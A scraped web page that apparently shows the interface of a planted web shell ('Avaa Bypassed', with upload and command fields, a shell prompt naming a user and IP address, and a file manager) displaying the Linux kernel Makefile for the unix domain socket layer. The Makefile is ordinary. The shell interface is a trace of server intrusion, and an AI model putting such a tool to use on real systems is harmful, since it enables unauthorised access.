404

[ Avaa Bypassed ]




Upload:

Command:

botdev@18.227.114.67: ~ $
# SPDX-License-Identifier: GPL-2.0
#
# Makefile for the Linux unix domain socket layer.
#

obj-$(CONFIG_UNIX)	+= unix.o

unix-y			:= af_unix.o garbage.o
unix-$(CONFIG_SYSCTL)	+= sysctl_net_unix.o

obj-$(CONFIG_UNIX_DIAG)	+= unix_diag.o
unix_diag-y		:= diag.o

obj-$(CONFIG_UNIX_SCM)	+= scm.o

Filemanager

Name Type Size Permission Actions
Kconfig File 1016 B 0644
Makefile File 292 B 0644